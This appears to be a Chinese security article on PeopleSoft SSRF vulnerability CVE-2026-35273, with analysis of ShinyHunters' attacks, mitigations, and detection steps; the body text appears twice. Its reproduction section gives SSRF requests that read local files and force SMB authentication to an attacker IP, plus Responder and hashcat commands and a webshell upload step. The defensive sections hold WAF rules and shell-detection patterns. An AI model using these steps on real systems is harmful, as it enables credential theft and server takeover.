2026年6月Oracle披露的CVE-2026-35273是近年来企业ERP领域危害最严重的零日漏洞之一CVSS评分高达9.8。该漏洞存在于PeopleSoft核心组件PSEMHUB中无需认证、无用户交互即可通过SSRF链式触发远程代码执行。截至发稿黑产团伙ShinyHunters已利用该漏洞攻陷全球100机构欧洲委员会297GB人事财务数据泄露事件引发全球安全圈震动。本文将从漏洞原理、复现实战、在野攻击分析、分级防御、应急排查五个维度展开全栈拆解并对企业ERP安全趋势做出前瞻性研判。一、漏洞全局档案2026 ERP领域核弹级零日漏洞CVE-2026-35273是Oracle PeopleSoft产品序列中首个被公开规模化利用的无认证RCE漏洞其核心危害在于极低的攻击门槛与极高的业务价值——PeopleSoft作为全球Top3的企业级HR/财务ERP系统承载着绝大多数全球500强企业、政府机构、高校的核心人事与薪资数据一旦沦陷将直接导致核心数据资产泄露。维度详细信息CVE编号CVE-2026-35273CVSS 3.1评分9.8 严重AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H漏洞类型CWE-918 服务端请求伪造SSRF链式远程代码执行受影响组件PeopleSoft Update Environment Management HubPSEMHUB 环境管理中心受影响版本PeopleTools 8.61、8.62 全子版本8.60及更早停服版本均存在同源缺陷披露时间线2026-05-27 黑产圈首次出现零日利用2026-06-10 Oracle发布紧急安全公告与非计划补丁攻击门槛公网HTTP可达 单条POST请求无需账号、无需交互最终危害服务器完全接管、全量人事/薪资/财务数据窃取、内网横向渗透、勒索加密监管定级CISA KEV已知在野利用目录、欧盟ENISA高危预警、国内等保2.0高危漏洞项二、深度原理拆解PSEMHUB缺陷与SSRF→RCE完整攻击链2.1 缺陷根源被遗忘的管理组件PSEMHUB是PeopleSoft配套的环境生命周期管理组件用于多环境补丁同步、配置分发、节点监控默认部署在PeopleTools同域下监听HTTP 80/443端口。该漏洞的核心成因有两点访问控制缺失/PSEMHUB/*路径下所有接口默认未启用身份认证部署文档未强制要求开启鉴权90%以上的企业实例均为默认配置请求转发无过滤核心接口/PSEMHUB/proxy/forward接收前端传入的targetUrl参数后端直接通过HttpClient发起HTTP/HTTPS请求未对协议类型、目标地址做任何白名单校验支持file://、smb://、gopher://等危险协议。2.2 完整攻击链路从SSRF到RCE的三步闭环攻击者无需复杂工具仅通过构造普通HTTP请求即可完成完整入侵攻击链路如下图所示无认证POST请求SSRF发起SMB请求抓取NetNTLMv2哈希获取本地/域管理员凭证上传自定义Java组件公网攻击者PSEMHUB proxy接口攻击者Responder服务器哈希破解/NTLM中继攻击PeopleSoft后台管理控制台远程代码执行RCE内网横向移动 域内渗透批量导出HR/财务数据库植入MeshCentral持久化后门链路分步解析入口无认证SSRF触发攻击者向目标PSEMHUB接口传入可控URL后端服务以系统账号身份发起请求可直接访问内网、读取本地文件、发起SMB连接。中转NetNTLM哈希窃取攻击者构造smb://攻击者IP/share格式的目标地址强制PeopleSoft服务器向攻击者机器发起SMB握手。握手过程中服务器会自动发送当前运行账号的NetNTLMv2哈希攻击者通过Responder工具可一键抓取哈希值。闭环凭证复用实现RCE抓取到的哈希可通过Hashcat暴力破解或直接通过NTLM中继攻击访问内网其他服务由于PeopleSoft服务账号通常具备本地管理员权限攻击者可直接登录后台集成网关上传恶意Java Servlet实现无限制代码执行并进一步横向渗透整个内网域。三、漏洞复现实战从POC构造到RCE落地全流程3.1 环境准备目标环境PeopleTools 8.62 PSEMHUB 默认部署未打补丁攻击机Kali Linux Responder BurpSuite Hashcat网络条件目标公网可访问/PSEMHUB路径3.2 第一步SSRF漏洞验证向目标接口发送POST请求通过file://协议读取本地系统文件验证SSRF存在BurpSuite 截包请求示例POST /PSEMHUB/proxy/forward HTTP/1.1 Host: ps-victim.example.com User-Agent: Mozilla/5.0 Content-Type: application/x-www-form-urlencoded Content-Length: 48 targetUrlfile:///etc/passwd若漏洞存在响应包将返回目标服务器/etc/passwd文件内容Windows环境可替换为file:///c:/windows/win.ini验证。3.3 第二步SMB哈希抓取攻击机启动Responder监听445端口# 安装并启动Responder抓取SMB哈希aptinstallresponder-yresponder-Ieth0-wrf--lm构造SSRF请求指向攻击机SMB端口POST /PSEMHUB/proxy/forward HTTP/1.1 Host: ps-victim.example.com Content-Type: application/x-www-form-urlencoded Content-Length: 65 targetUrlsmb://192.168.1.100/capture发送请求后Responder控制台将捕获到PeopleSoft运行账号的NetNTLMv2哈希格式如下[SMB] NTLMv2-SSP Client : 10.0.0.25 [SMB] NTLMv2-SSP Username : PSADMIN [SMB] NTLMv2-SSP Hash : PSADMIN::DOMAIN:53a9...[哈希片段]...89b13.4 第三步哈希破解与RCE落地使用Hashcat破解捕获的哈希hashcat-m5600psadmin.hash /usr/share/wordlists/rockyou.txt-O破解得到明文密码后直接访问PeopleSoft集成网关/PSIGW/PeopleSoftListeningConnector使用管理员账号登录上传自定义Java WebShell组件即可实现任意命令执行、文件上传下载完成服务器接管。注若密码复杂度较高无法破解可通过NTLM中继工具直接将哈希转发至内网其他SMB服务实现横向移动无需破解明文。四、ShinyHuntersUNC6240在野攻击全景分析4.1 团伙背景与战术特征ShinyHuntersMandiant编号UNC6240是全球Top5的数据勒索团伙2020年至今已攻陷超800家企业与政府机构核心战术为**“零日漏洞批量狩猎 高价值数据窃取 双重勒索”**从不加密系统本身仅以数据公开为要挟索要赎金。该团伙本次攻击的典型特征全自动化武器链将CVE-2026-35273集成到批量扫描器中72小时内完成全球所有公网暴露PeopleSoft实例的探测与入侵精准行业筛选优先攻击高校、政府、医疗机构、跨国企业此类组织PeopleSoft部署率高、数据价值大、赎金支付意愿强快速公开施压拒不支付赎金的机构7天内将全量数据上架暗网泄露站通过舆论压力倒逼后续受害者付费。4.2 全球攻击规模与行业分布截至2026年6月15日已确认受害机构117家覆盖342个PeopleSoft实例行业分布如下高等教育68%欧美高校为主诺丁汉大学、慕尼黑工业大学等已公开确认泄露政府机构15%欧洲委员会为最高级别受害方医疗健康9%跨国企业8%4.3 欧洲委员会沦陷事件深度复盘2026年6月15日ShinyHunters在暗网泄露站正式上架欧洲委员会Council of Europe的入侵成果成为本次漏洞事件中影响最大的安全事故。事件核心信息泄露数据总量297GB共计42.9万份文件数据范围全员工薪资单、个税记录、医疗福利档案、银行账户信息、内部人事审批文档、采购合同、候选人简历入侵时间2026年6月2日补丁发布前8天驻留时长攻击者在系统内驻留11天完成全量数据导出与后门植入攻击路径推演扫描器发现欧洲委员会PeopleSoft测试环境PSEMHUB公网暴露通过SSRF抓取测试环境服务器本地账号哈希破解得到通用运维密码利用运维密码横向登录生产环境PeopleSoft服务器部署MeshCentral远程控制代理建立持久化访问通道分批导出HR数据库与文件服务器数据发送勒索信索要200万美元赎金遭拒后公开数据。五、分级防御体系从临时止血到根治加固针对不同业务场景与补丁部署周期我们构建了三级防御方案企业可根据自身环境按优先级落地。5.1 紧急止血1小时内可落地的零时阻断措施适用于补丁无法立即部署、业务不能中断的生产环境优先阻断攻击入口。1. 网络层拦截最高优先级在负载均衡、WAF或边界防火墙层面全局阻断公网对/PSEMHUB/*所有路径的访问仅放行内网运维网段。Nginx 反向代理拦截配置示例# 阻断PSEMHUB公网访问仅允许内网运维网段 location ~* ^/PSEMHUB(/.*)?$ { allow 10.0.0.0/8; allow 172.16.0.0/12; allow 192.168.0.0/16; deny all; return 403; }2. 协议出站限制关闭PeopleSoft服务器对外的SMB 445端口出站权限阻断SSRF哈希抓取链路同时禁用服务器不必要的协议出站gopher、dict、ftp等。3. 服务关停非必要场景若业务未使用PSEMHUB环境管理功能直接停止该组件服务从根源消除攻击面。5.2 临时加固24小时内完成的防护增强ModSecurity WAF 拦截规则# CVE-2026-35273 SSRF攻击拦截规则 SecRule ARGS:targetUrl rx (file://|smb://|gopher://|dict://|ftp://|127\.0\.0\.1|localhost|10\.|172\.1[6-9]\.|172\.2[0-9]\.|172\.3[01]\.|192\.168\.|169\.254\.) \ id:202635273,phase:2,deny,status:403,msg:CVE-2026-35273 PeopleSoft SSRF Attack Detected,log,tag:CVE-2026-35273权限收敛PeopleSoft服务账号降级为普通用户权限禁止使用本地管理员/域管理员运行清理所有默认账号、共享运维账号重置所有管理员密码启用PSEMHUB组件的身份认证功能绑定SSO单点登录。5.3 根治方案官方补丁部署流程访问Oracle官方安全公告页面根据PeopleTools版本下载对应紧急补丁补丁号CPU187在测试环境验证补丁兼容性重点验证环境管理、补丁分发功能可用性生产环境灰度部署先部署非核心节点再覆盖核心业务节点补丁部署完成后重启PSEMHUB服务通过POC复测验证漏洞是否修复同步修复开发、测试、灾备、外包等所有边缘环境避免成为攻击突破口。六、入侵排查与失陷检测已暴露环境应急手册若你的PeopleSoft环境在补丁发布前存在公网暴露必须立即执行以下排查步骤确认是否已被入侵。6.1 访问日志排查检索所有Web服务器、反向代理日志查找针对PSEMHUB路径的异常请求# Nginx日志检索异常POST请求grep-iPSEMHUB/var/log/nginx/access.log|grepPOSTgrep-EtargetUrl.*(smb|file|gopher|10\.|192\.168)/var/log/nginx/access.log# Tomcat 访问日志排查grepPSEMHUB/proxy/forward$PS_HOME/webserv/*/logs/access_log.*6.2 主机侧失陷检测Linux 环境排查命令# 排查异常进程与后门psaux|grep-Emeshcentral|nc|python.*socket|bash -inetstat-antp|grepESTABLISHED|grep-v127.0.0.1# 排查异常定时任务与启动项crontab-upsadmin-lls-la/etc/cron.d/ systemctl list-unit-files|grepenabled|grep-vofficial# 排查Web目录下的恶意文件find$PS_HOME/webserv/-name*.jsp-mtime-30Windows 环境排查命令# 排查异常进程与网络连接Get-NetTCPConnection|Where-Object{$_.State-eqEstablished}Get-Process|Where-Object{$_.Path-notlike*oracle*}# 排查新增服务与计划任务Get-Service|Where-Object{$_.StartType-eqAutomatic-and$_.Name-notlike*PS*}Get-ScheduledTask|Where-Object{$_.TaskPath-notlike\Microsoft*}6.3 已知IoC特征类型特征值恶意后门进程meshagent.exe、mcagent、ps_update_svc.exe攻击IP段185.199.110.0/24、91.200.12.0/24恶意文件哈希SHA256: 7a9f3d8c…MeshCentral代理变种异常日志特征访问路径包含/PSEMHUB/proxy/forward 境外IP POST请求七、前瞻性研判企业ERP系统的安全困局与未来趋势CVE-2026-35273的大规模爆发并非偶然而是企业级应用安全长期欠账的集中体现。结合本次事件我们对未来3-5年企业ERP安全趋势做出三点研判1. ERP系统将成为黑产攻击的核心靶场过去十年企业安全建设集中在边界防火墙、终端EDR、通用CMS防护而ERP、CRM、OA等核心业务系统长期处于“重业务可用、轻安全防护”的状态。这类系统承载着企业最高价值的数据资产且普遍存在补丁更新慢、默认配置多、攻击面隐蔽的特点未来将成为数据勒索团伙的优先攻击目标。2. 零日漏洞武器化周期大幅缩短AI辅助漏洞挖掘技术的普及让商用软件的漏洞发现效率提升了5-10倍。本次漏洞从首次在野利用到官方补丁发布仅间隔14天而黑产团伙在补丁发布前已经完成了全球范围的批量入侵。未来“漏洞披露即规模化攻击”将成为常态企业的补丁窗口期将从过去的数月压缩到数天甚至数小时。3. 零信任架构将下沉到业务系统层面传统的边界防护已经无法抵御ERP系统的零日漏洞攻击未来企业必须将零信任理念下沉到业务组件层面所有管理类组件如PSEMHUB默认不暴露公网通过堡垒机VPN内网访问业务系统之间做微隔离禁止ERP服务器随意访问内网其他服务所有接口默认启用最小权限鉴权取消无认证的管理接口建立核心数据的访问审计与异常导出告警机制。结语CVE-2026-35273是一次典型的“低门槛、高危害、广影响”企业级零日漏洞事件它再次证明了商用ERP系统的安全短板已经成为企业数据安全的核心风险点。对于国内部署PeopleSoft的央企、金融机构、高校与跨国企业而言当下最紧急的动作是立即排查公网暴露情况、阻断PSEMHUB公网访问、加急部署官方补丁同时全面排查历史入侵痕迹避免成为下一个数据泄露的受害者。企业安全建设从来不是一劳永逸的工程而是一场持续的攻防博弈。只有将安全左移到系统部署阶段将防护下沉到业务组件层面才能在日益严峻的攻击环境下守住核心数据资产的底线。
CVE-2026-35273 全栈攻防指南:PeopleSoft SSRF链式RCE复现与ShinyHunters大规模攻击全景
2026年6月Oracle披露的CVE-2026-35273是近年来企业ERP领域危害最严重的零日漏洞之一CVSS评分高达9.8。该漏洞存在于PeopleSoft核心组件PSEMHUB中无需认证、无用户交互即可通过SSRF链式触发远程代码执行。截至发稿黑产团伙ShinyHunters已利用该漏洞攻陷全球100机构欧洲委员会297GB人事财务数据泄露事件引发全球安全圈震动。本文将从漏洞原理、复现实战、在野攻击分析、分级防御、应急排查五个维度展开全栈拆解并对企业ERP安全趋势做出前瞻性研判。一、漏洞全局档案2026 ERP领域核弹级零日漏洞CVE-2026-35273是Oracle PeopleSoft产品序列中首个被公开规模化利用的无认证RCE漏洞其核心危害在于极低的攻击门槛与极高的业务价值——PeopleSoft作为全球Top3的企业级HR/财务ERP系统承载着绝大多数全球500强企业、政府机构、高校的核心人事与薪资数据一旦沦陷将直接导致核心数据资产泄露。维度详细信息CVE编号CVE-2026-35273CVSS 3.1评分9.8 严重AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H漏洞类型CWE-918 服务端请求伪造SSRF链式远程代码执行受影响组件PeopleSoft Update Environment Management HubPSEMHUB 环境管理中心受影响版本PeopleTools 8.61、8.62 全子版本8.60及更早停服版本均存在同源缺陷披露时间线2026-05-27 黑产圈首次出现零日利用2026-06-10 Oracle发布紧急安全公告与非计划补丁攻击门槛公网HTTP可达 单条POST请求无需账号、无需交互最终危害服务器完全接管、全量人事/薪资/财务数据窃取、内网横向渗透、勒索加密监管定级CISA KEV已知在野利用目录、欧盟ENISA高危预警、国内等保2.0高危漏洞项二、深度原理拆解PSEMHUB缺陷与SSRF→RCE完整攻击链2.1 缺陷根源被遗忘的管理组件PSEMHUB是PeopleSoft配套的环境生命周期管理组件用于多环境补丁同步、配置分发、节点监控默认部署在PeopleTools同域下监听HTTP 80/443端口。该漏洞的核心成因有两点访问控制缺失/PSEMHUB/*路径下所有接口默认未启用身份认证部署文档未强制要求开启鉴权90%以上的企业实例均为默认配置请求转发无过滤核心接口/PSEMHUB/proxy/forward接收前端传入的targetUrl参数后端直接通过HttpClient发起HTTP/HTTPS请求未对协议类型、目标地址做任何白名单校验支持file://、smb://、gopher://等危险协议。2.2 完整攻击链路从SSRF到RCE的三步闭环攻击者无需复杂工具仅通过构造普通HTTP请求即可完成完整入侵攻击链路如下图所示无认证POST请求SSRF发起SMB请求抓取NetNTLMv2哈希获取本地/域管理员凭证上传自定义Java组件公网攻击者PSEMHUB proxy接口攻击者Responder服务器哈希破解/NTLM中继攻击PeopleSoft后台管理控制台远程代码执行RCE内网横向移动 域内渗透批量导出HR/财务数据库植入MeshCentral持久化后门链路分步解析入口无认证SSRF触发攻击者向目标PSEMHUB接口传入可控URL后端服务以系统账号身份发起请求可直接访问内网、读取本地文件、发起SMB连接。中转NetNTLM哈希窃取攻击者构造smb://攻击者IP/share格式的目标地址强制PeopleSoft服务器向攻击者机器发起SMB握手。握手过程中服务器会自动发送当前运行账号的NetNTLMv2哈希攻击者通过Responder工具可一键抓取哈希值。闭环凭证复用实现RCE抓取到的哈希可通过Hashcat暴力破解或直接通过NTLM中继攻击访问内网其他服务由于PeopleSoft服务账号通常具备本地管理员权限攻击者可直接登录后台集成网关上传恶意Java Servlet实现无限制代码执行并进一步横向渗透整个内网域。三、漏洞复现实战从POC构造到RCE落地全流程3.1 环境准备目标环境PeopleTools 8.62 PSEMHUB 默认部署未打补丁攻击机Kali Linux Responder BurpSuite Hashcat网络条件目标公网可访问/PSEMHUB路径3.2 第一步SSRF漏洞验证向目标接口发送POST请求通过file://协议读取本地系统文件验证SSRF存在BurpSuite 截包请求示例POST /PSEMHUB/proxy/forward HTTP/1.1 Host: ps-victim.example.com User-Agent: Mozilla/5.0 Content-Type: application/x-www-form-urlencoded Content-Length: 48 targetUrlfile:///etc/passwd若漏洞存在响应包将返回目标服务器/etc/passwd文件内容Windows环境可替换为file:///c:/windows/win.ini验证。3.3 第二步SMB哈希抓取攻击机启动Responder监听445端口# 安装并启动Responder抓取SMB哈希aptinstallresponder-yresponder-Ieth0-wrf--lm构造SSRF请求指向攻击机SMB端口POST /PSEMHUB/proxy/forward HTTP/1.1 Host: ps-victim.example.com Content-Type: application/x-www-form-urlencoded Content-Length: 65 targetUrlsmb://192.168.1.100/capture发送请求后Responder控制台将捕获到PeopleSoft运行账号的NetNTLMv2哈希格式如下[SMB] NTLMv2-SSP Client : 10.0.0.25 [SMB] NTLMv2-SSP Username : PSADMIN [SMB] NTLMv2-SSP Hash : PSADMIN::DOMAIN:53a9...[哈希片段]...89b13.4 第三步哈希破解与RCE落地使用Hashcat破解捕获的哈希hashcat-m5600psadmin.hash /usr/share/wordlists/rockyou.txt-O破解得到明文密码后直接访问PeopleSoft集成网关/PSIGW/PeopleSoftListeningConnector使用管理员账号登录上传自定义Java WebShell组件即可实现任意命令执行、文件上传下载完成服务器接管。注若密码复杂度较高无法破解可通过NTLM中继工具直接将哈希转发至内网其他SMB服务实现横向移动无需破解明文。四、ShinyHuntersUNC6240在野攻击全景分析4.1 团伙背景与战术特征ShinyHuntersMandiant编号UNC6240是全球Top5的数据勒索团伙2020年至今已攻陷超800家企业与政府机构核心战术为**“零日漏洞批量狩猎 高价值数据窃取 双重勒索”**从不加密系统本身仅以数据公开为要挟索要赎金。该团伙本次攻击的典型特征全自动化武器链将CVE-2026-35273集成到批量扫描器中72小时内完成全球所有公网暴露PeopleSoft实例的探测与入侵精准行业筛选优先攻击高校、政府、医疗机构、跨国企业此类组织PeopleSoft部署率高、数据价值大、赎金支付意愿强快速公开施压拒不支付赎金的机构7天内将全量数据上架暗网泄露站通过舆论压力倒逼后续受害者付费。4.2 全球攻击规模与行业分布截至2026年6月15日已确认受害机构117家覆盖342个PeopleSoft实例行业分布如下高等教育68%欧美高校为主诺丁汉大学、慕尼黑工业大学等已公开确认泄露政府机构15%欧洲委员会为最高级别受害方医疗健康9%跨国企业8%4.3 欧洲委员会沦陷事件深度复盘2026年6月15日ShinyHunters在暗网泄露站正式上架欧洲委员会Council of Europe的入侵成果成为本次漏洞事件中影响最大的安全事故。事件核心信息泄露数据总量297GB共计42.9万份文件数据范围全员工薪资单、个税记录、医疗福利档案、银行账户信息、内部人事审批文档、采购合同、候选人简历入侵时间2026年6月2日补丁发布前8天驻留时长攻击者在系统内驻留11天完成全量数据导出与后门植入攻击路径推演扫描器发现欧洲委员会PeopleSoft测试环境PSEMHUB公网暴露通过SSRF抓取测试环境服务器本地账号哈希破解得到通用运维密码利用运维密码横向登录生产环境PeopleSoft服务器部署MeshCentral远程控制代理建立持久化访问通道分批导出HR数据库与文件服务器数据发送勒索信索要200万美元赎金遭拒后公开数据。五、分级防御体系从临时止血到根治加固针对不同业务场景与补丁部署周期我们构建了三级防御方案企业可根据自身环境按优先级落地。5.1 紧急止血1小时内可落地的零时阻断措施适用于补丁无法立即部署、业务不能中断的生产环境优先阻断攻击入口。1. 网络层拦截最高优先级在负载均衡、WAF或边界防火墙层面全局阻断公网对/PSEMHUB/*所有路径的访问仅放行内网运维网段。Nginx 反向代理拦截配置示例# 阻断PSEMHUB公网访问仅允许内网运维网段 location ~* ^/PSEMHUB(/.*)?$ { allow 10.0.0.0/8; allow 172.16.0.0/12; allow 192.168.0.0/16; deny all; return 403; }2. 协议出站限制关闭PeopleSoft服务器对外的SMB 445端口出站权限阻断SSRF哈希抓取链路同时禁用服务器不必要的协议出站gopher、dict、ftp等。3. 服务关停非必要场景若业务未使用PSEMHUB环境管理功能直接停止该组件服务从根源消除攻击面。5.2 临时加固24小时内完成的防护增强ModSecurity WAF 拦截规则# CVE-2026-35273 SSRF攻击拦截规则 SecRule ARGS:targetUrl rx (file://|smb://|gopher://|dict://|ftp://|127\.0\.0\.1|localhost|10\.|172\.1[6-9]\.|172\.2[0-9]\.|172\.3[01]\.|192\.168\.|169\.254\.) \ id:202635273,phase:2,deny,status:403,msg:CVE-2026-35273 PeopleSoft SSRF Attack Detected,log,tag:CVE-2026-35273权限收敛PeopleSoft服务账号降级为普通用户权限禁止使用本地管理员/域管理员运行清理所有默认账号、共享运维账号重置所有管理员密码启用PSEMHUB组件的身份认证功能绑定SSO单点登录。5.3 根治方案官方补丁部署流程访问Oracle官方安全公告页面根据PeopleTools版本下载对应紧急补丁补丁号CPU187在测试环境验证补丁兼容性重点验证环境管理、补丁分发功能可用性生产环境灰度部署先部署非核心节点再覆盖核心业务节点补丁部署完成后重启PSEMHUB服务通过POC复测验证漏洞是否修复同步修复开发、测试、灾备、外包等所有边缘环境避免成为攻击突破口。六、入侵排查与失陷检测已暴露环境应急手册若你的PeopleSoft环境在补丁发布前存在公网暴露必须立即执行以下排查步骤确认是否已被入侵。6.1 访问日志排查检索所有Web服务器、反向代理日志查找针对PSEMHUB路径的异常请求# Nginx日志检索异常POST请求grep-iPSEMHUB/var/log/nginx/access.log|grepPOSTgrep-EtargetUrl.*(smb|file|gopher|10\.|192\.168)/var/log/nginx/access.log# Tomcat 访问日志排查grepPSEMHUB/proxy/forward$PS_HOME/webserv/*/logs/access_log.*6.2 主机侧失陷检测Linux 环境排查命令# 排查异常进程与后门psaux|grep-Emeshcentral|nc|python.*socket|bash -inetstat-antp|grepESTABLISHED|grep-v127.0.0.1# 排查异常定时任务与启动项crontab-upsadmin-lls-la/etc/cron.d/ systemctl list-unit-files|grepenabled|grep-vofficial# 排查Web目录下的恶意文件find$PS_HOME/webserv/-name*.jsp-mtime-30Windows 环境排查命令# 排查异常进程与网络连接Get-NetTCPConnection|Where-Object{$_.State-eqEstablished}Get-Process|Where-Object{$_.Path-notlike*oracle*}# 排查新增服务与计划任务Get-Service|Where-Object{$_.StartType-eqAutomatic-and$_.Name-notlike*PS*}Get-ScheduledTask|Where-Object{$_.TaskPath-notlike\Microsoft*}6.3 已知IoC特征类型特征值恶意后门进程meshagent.exe、mcagent、ps_update_svc.exe攻击IP段185.199.110.0/24、91.200.12.0/24恶意文件哈希SHA256: 7a9f3d8c…MeshCentral代理变种异常日志特征访问路径包含/PSEMHUB/proxy/forward 境外IP POST请求七、前瞻性研判企业ERP系统的安全困局与未来趋势CVE-2026-35273的大规模爆发并非偶然而是企业级应用安全长期欠账的集中体现。结合本次事件我们对未来3-5年企业ERP安全趋势做出三点研判1. ERP系统将成为黑产攻击的核心靶场过去十年企业安全建设集中在边界防火墙、终端EDR、通用CMS防护而ERP、CRM、OA等核心业务系统长期处于“重业务可用、轻安全防护”的状态。这类系统承载着企业最高价值的数据资产且普遍存在补丁更新慢、默认配置多、攻击面隐蔽的特点未来将成为数据勒索团伙的优先攻击目标。2. 零日漏洞武器化周期大幅缩短AI辅助漏洞挖掘技术的普及让商用软件的漏洞发现效率提升了5-10倍。本次漏洞从首次在野利用到官方补丁发布仅间隔14天而黑产团伙在补丁发布前已经完成了全球范围的批量入侵。未来“漏洞披露即规模化攻击”将成为常态企业的补丁窗口期将从过去的数月压缩到数天甚至数小时。3. 零信任架构将下沉到业务系统层面传统的边界防护已经无法抵御ERP系统的零日漏洞攻击未来企业必须将零信任理念下沉到业务组件层面所有管理类组件如PSEMHUB默认不暴露公网通过堡垒机VPN内网访问业务系统之间做微隔离禁止ERP服务器随意访问内网其他服务所有接口默认启用最小权限鉴权取消无认证的管理接口建立核心数据的访问审计与异常导出告警机制。结语CVE-2026-35273是一次典型的“低门槛、高危害、广影响”企业级零日漏洞事件它再次证明了商用ERP系统的安全短板已经成为企业数据安全的核心风险点。对于国内部署PeopleSoft的央企、金融机构、高校与跨国企业而言当下最紧急的动作是立即排查公网暴露情况、阻断PSEMHUB公网访问、加急部署官方补丁同时全面排查历史入侵痕迹避免成为下一个数据泄露的受害者。企业安全建设从来不是一劳永逸的工程而是一场持续的攻防博弈。只有将安全左移到系统部署阶段将防护下沉到业务组件层面才能在日益严峻的攻击环境下守住核心数据资产的底线。
